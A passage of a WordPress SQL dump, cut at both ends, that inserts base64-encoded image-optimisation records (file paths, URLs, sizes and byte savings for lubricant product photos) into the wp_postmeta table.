wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkbC1kcnktZmlsbS1sdWJyaWNhbnQtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xMjJhZGwtZHJ5LWZpbG0tbHVicmljYW50LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjo4NDgsInRpbWUiOjE0ODM1NjY5NDAsImlkIjoxNjgwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkbC1kcnktZmlsbS1sdWJyaWNhbnQtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZGwtZHJ5LWZpbG0tbHVicmljYW50LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyYWRsLWRyeS1maWxtLWx1YnJpY2FudC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6ODQ1LCJ0aW1lIjoxNDgzNTY2OTQ1LCJpZCI6MTY4MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZGwtZHJ5LWZpbG0tbHVicmljYW50LTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkbC1kcnktZmlsbS1sdWJyaWNhbnQtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTEyMmFkbC1kcnktZmlsbS1sdWJyaWNhbnQtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MjA2NywidGltZSI6MTQ4MzU2Njk1MCwiaWQiOjE2ODB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWRsLWRyeS1maWxtLWx1YnJpY2FudC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkbC1kcnktZmlsbS1sdWJyaWNhbnQtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xMjJhZGwtZHJ5LWZpbG0tbHVicmljYW50LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MjEsInRpbWUiOjE0ODM1NjY5NTMsImlkIjoxNjgwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkbC1kcnktZmlsbS1sdWJyaWNhbnQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZGwtZHJ5LWZpbG0tbHVicmljYW50LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyYWRsLWRyeS1maWxtLWx1YnJpY2FudC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDIxLCJ0aW1lIjoxNDgzNTY2OTU2LCJpZCI6MTY4MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZGwtZHJ5LWZpbG0tbHVicmljYW50LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWRsLWRyeS1maWxtLWx1YnJpY2FudC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTEyMmFkbC1kcnktZmlsbS1sdWJyaWNhbnQtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ3NywidGltZSI6MTQ4MzU2Njk2MCwiaWQiOjE2ODB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWRsLWRyeS1maWxtLWx1YnJpY2FudC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkbC1kcnktZmlsbS1sdWJyaWNhbnQtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xMjJhZGwtZHJ5LWZpbG0tbHVicmljYW50LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo3NDksInRpbWUiOjE0ODM1NjY5NjQsImlkIjoxNjgwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWRsLWRyeS1maWxtLWx1YnJpY2FudC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkbC1kcnktZmlsbS1sdWJyaWNhbnQtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xMjJhZGwtZHJ5LWZpbG0tbHVicmljYW50LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MjYsInRpbWUiOjE0ODM1NjY5NjcsImlkIjoxNjgwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWRsLWRyeS1maWxtLWx1YnJpY2FudC0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkbC1kcnktZmlsbS1sdWJyaWNhbnQtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xMjJhZGwtZHJ5LWZpbG0tbHVicmljYW50LTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo1NzIsInRpbWUiOjE0ODM1NjY5NzEsImlkIjoxNjgwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWRsLWRyeS1maWxtLWx1YnJpY2FudC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkbC1kcnktZmlsbS1sdWJyaWNhbnQtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xMjJhZGwtZHJ5LWZpbG0tbHVicmljYW50LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2MjAsInRpbWUiOjE0ODM1NjY5NzQsImlkIjoxNjgwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWRsLWRyeS1maWxtLWx1YnJpY2FudC00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkbC1kcnktZmlsbS1sdWJyaWNhbnQtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xMjJhZGwtZHJ5LWZpbG0tbHVicmljYW50LTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo3MDAsInRpbWUiOjE0ODM1NjY5NzgsImlkIjoxNjgwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWRsLWRyeS1maWxtLWx1YnJpY2FudC05MHg5MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZGwtZHJ5LWZpbG0tbHVicmljYW50LTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xMjJhZGwtZHJ5LWZpbG0tbHVicmljYW50LTkweDkwLmpwZyIsInJlZHVjdGlvbiI6NDM5LCJ0aW1lIjoxNDgzNTY2OTgxLCJpZCI6MTY4MH1d'); 
INSERT INTO `wp_postmeta` VALUES (29326, 1678, 'wpfc_optimisation_reduction', '9208'); 
INSERT INTO `wp_postmeta` VALUES (29327, 1678, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtZHJ5LWZpbG0tbHVicmljYW50LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtZHJ5LWZpbG0tbHVicmljYW50LmpwZyIsIndpZHRoIjo1NzYwLCJoZWlnaHQiOjM4NDAsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjY5ODYsImlkIjoiMTY3OCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtZHJ5LWZpbG0tbHVicmljYW50LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtZHJ5LWZpbG0tbHVicmljYW50LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyYWQtZHJ5LWZpbG0tbHVicmljYW50LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo1NjgsInRpbWUiOjE0ODM1NjY5OTAsImlkIjoxNjc4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLWRyeS1maWxtLWx1YnJpY2FudC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLWRyeS1maWxtLWx1YnJpY2FudC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTEyMmFkLWRyeS1maWxtLWx1YnJpY2FudC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6OTE1LCJ0aW1lIjoxNDgzNTY2OTk0LCJpZCI6MTY3OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZC1kcnktZmlsbS1sdWJyaWNhbnQtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZC1kcnktZmlsbS1sdWJyaWNhbnQtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xMjJhZC1kcnktZmlsbS1sdWJyaWNhbnQtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjg3MywidGltZSI6MTQ4MzU2Njk5OCwiaWQiOjE2Nzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtZHJ5LWZpbG0tbHVicmljYW50LTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLWRyeS1maWxtLWx1YnJpY2FudC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyYWQtZHJ5LWZpbG0tbHVicmljYW50LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjI3NTYsInRpbWUiOjE0ODM1NjcwMDMsImlkIjoxNjc4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLWRyeS1maWxtLWx1YnJpY2FudC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLWRyeS1maWxtLWx1YnJpY2FudC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTEyMmFkLWRyeS1maWxtLWx1YnJpY2FudC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTM2LCJ0aW1lIjoxNDgzNTY3MDA2LCJpZCI6MTY3OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZC1kcnktZmlsbS1sdWJyaWNhbnQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZC1kcnktZmlsbS1sdWJyaWNhbnQtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xMjJhZC1kcnktZmlsbS1sdWJyaWNhbnQtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ1NSwidGltZSI6MTQ4MzU2NzAwOSwiaWQiOjE2Nzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtZHJ5LWZpbG0tbHVicmljYW50LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtZHJ5LWZpbG0tbHVicmljYW50LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyYWQtZHJ5LWZpbG0tbHVicmljYW50LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MDcsInRpbWUiOjE0ODM1NjcwMTMsImlkIjoxNjc4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLWRyeS1maWxtLWx1YnJpY2FudC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLWRyeS1maWxtLWx1YnJpY2FudC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTEyMmFkLWRyeS1maWxtLWx1YnJpY2FudC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6NzY2LCJ0aW1lIjoxNDgzNTY3MDE2LCJpZCI6MTY3OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLWRyeS1maWxtLWx1YnJpY2FudC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLWRyeS1maWxtLWx1YnJpY2FudC0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTEyMmFkLWRyeS1maWxtLWx1YnJpY2FudC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDkzLCJ0aW1lIjoxNDgzNTY3MDIwLCJpZCI6MTY3OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLWRyeS1maWxtLWx1YnJpY2FudC0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLWRyeS1maWxtLWx1YnJpY2FudC0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTEyMmFkLWRyeS1maWxtLWx1YnJpY2FudC0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NjIyLCJ0aW1lIjoxNDgzNTY3MDIzLCJpZCI6MTY3OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLWRyeS1maWxtLWx1YnJpY2FudC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLWRyeS1maWxtLWx1YnJpY2FudC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTEyMmFkLWRyeS1maWxtLWx1YnJpY2FudC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzE3LCJ0aW1lIjoxNDgzNTY3MDI3LCJpZCI6MTY3OH1d'); 
INSERT INTO `wp_postmeta` VALUES (29328, 1676, 'wpfc_optimisation_reduction', '21702'); 
INSERT INTO `wp_postmeta` VALUES (29329, 1676, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZHJ5ZmlsbS1sdWJyaWNhbnQuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9kcnlmaWxtLWx1YnJpY2FudC5qcGciLCJ3aWR0aCI6Mzc5MCwiaGVpZ2h0IjoyNzQyLCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTY3MDMyLCJpZCI6IjE2NzYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2RyeWZpbG0tbHVicmljYW50LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZHJ5ZmlsbS1sdWJyaWNhbnQtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wv